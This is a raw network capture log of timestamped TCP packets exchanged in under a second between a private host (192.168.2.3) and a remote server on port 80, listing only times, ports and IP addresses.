Dec 5, 2022 01:32:37.671885014 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.671888113 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.671928883 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.672427893 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.672471046 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.672513008 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.672553062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.672570944 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.672591925 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.672605991 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.672633886 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.672672987 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.672713041 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.672719002 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.672755003 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.675463915 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.675508022 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.675549984 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.675590992 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.675604105 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.675631046 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.675673008 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.675678015 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.675713062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.675714970 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.675753117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.675792933 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.675832987 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.675838947 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.675873041 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.675882101 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.675913095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.675952911 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.675993919 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.676002026 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.676035881 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.676038980 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.676075935 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.676116943 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.676156998 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.676163912 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.676197052 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.676202059 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.676238060 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.676275969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.676306963 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.676318884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.676350117 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.676548004 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.676589966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.676629066 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.676670074 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.676676989 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.676709890 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.676711082 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.676749945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.676789999 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.676830053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.676836014 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.676870108 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.676872015 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.676908970 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.676948071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.676987886 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.676991940 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.677027941 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.677028894 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.677521944 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.677566051 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.677607059 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.677638054 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.677648067 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.677658081 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.677716017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.677751064 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.677783966 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.677797079 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.677818060 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.677822113 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.677851915 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.677886009 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.677921057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.677928925 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.677956104 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.677958965 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.677987099 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.678428888 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.678467035 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.678500891 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.678512096 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.678533077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.678535938 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.678570032 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.678603888 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.678613901 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.678639889 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.678643942 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.678673029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.678708076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.678744078 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.678751945 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.678777933 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.678785086 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.678812981 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.678845882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.678889036 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.679404020 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.679441929 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.679476976 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.679512024 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.679519892 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.679539919 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.679547071 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.679579973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.679588079 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.679614067 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.679647923 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.679681063 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.679692030 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.679713964 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.679718971 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.679747105 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.679780960 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.679815054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.679821014 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.679868937 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.680427074 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.680463076 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.680496931 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.680531979 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.680558920 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.680565119 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.680578947 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.680600882 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.680634975 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.680668116 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.680679083 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.680702925 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.680710077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.680736065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.680768967 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.680803061 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.680809975 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.680836916 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.680841923 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.681332111 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.681368113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.681404114 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.681433916 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.681441069 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.681451082 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.681474924 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.681510925 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.681544065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.681552887 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.681577921 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.681581974 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.681612968 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.681647062 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.681679964 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.681688070 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.681713104 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.681716919 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.681747913 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.682308912 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.682360888 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.682383060 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.682396889 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.682401896 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.682430029 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.682463884 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.682497978 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.682507038 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.682532072 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.682534933 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.682565928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.682599068 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.682631969 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.682645082 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.682667017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.682671070 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.693449974 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.693486929 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.693520069 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.693552017 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.693573952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.693583965 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.693603992 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.693618059 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.693650961 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.693664074 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.693681955 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.693689108 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.693715096 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.693747997 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.693779945 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.693790913 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.693811893 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.693819046 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.693845034 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.693876028 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.693907976 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.693924904 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.693941116 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.693952084 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.693973064 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694005013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694036007 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694046974 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.694067955 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694072962 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.694099903 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694132090 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694163084 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694170952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.694195032 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694200039 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.694226027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694258928 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694289923 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694299936 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.694322109 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694328070 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.694354057 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694386959 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694418907 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694427013 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.694449902 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694453955 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.694482088 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694514036 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694559097 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.694693089 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694727898 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694741964 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.694760084 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694793940 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694827080 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694834948 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.694859028 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694864035 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.694905043 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694938898 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694971085 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.694978952 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.695003986 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.695008993 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.695035934 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.695069075 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.695101976 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.695111990 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.695135117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.695138931 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.695167065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.695199013 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.695230961 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.695240021 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.695262909 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.695269108 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.695296049 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.695327997 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.695370913 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.695678949 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.695713043 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.695749044 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.695781946 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.695782900 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.695805073 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.695812941 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.695846081 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.695877075 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.695888996 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.695909023 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.695918083 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.695940971 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.695972919 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.696005106 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.696011066 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.696037054 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.696043968 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.696068048 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.696100950 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.696132898 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.696140051 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.696165085 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.696170092 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.696197033 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.696228027 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.696259022 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.696269035 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.696290970 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.696297884 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.696621895 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.696655989 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.696688890 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.696702003 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.696719885 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.696723938 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.696753025 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.696784973 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.696818113 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.696821928 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.696850061 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.696854115 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.696882010 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.696913958 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.696945906 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.696953058 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.696976900 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.696980953 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.697009087 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.697040081 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.697071075 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.697077036 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.697103977 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.697107077 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.697137117 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.697169065 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.697200060 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.697207928 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.697232962 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.697237015 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.697670937 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.697725058 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.697757006 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.697772026 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.697792053 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.697794914 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.697825909 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.697858095 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.697891951 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.697900057 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.697925091 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.697928905 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.697969913 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.698000908 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.698033094 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.698040962 CET	49705	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:37.698064089 CET	80	49705	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:37.698070049 CET	49705	80	192.168.2.3	66.235.200.147
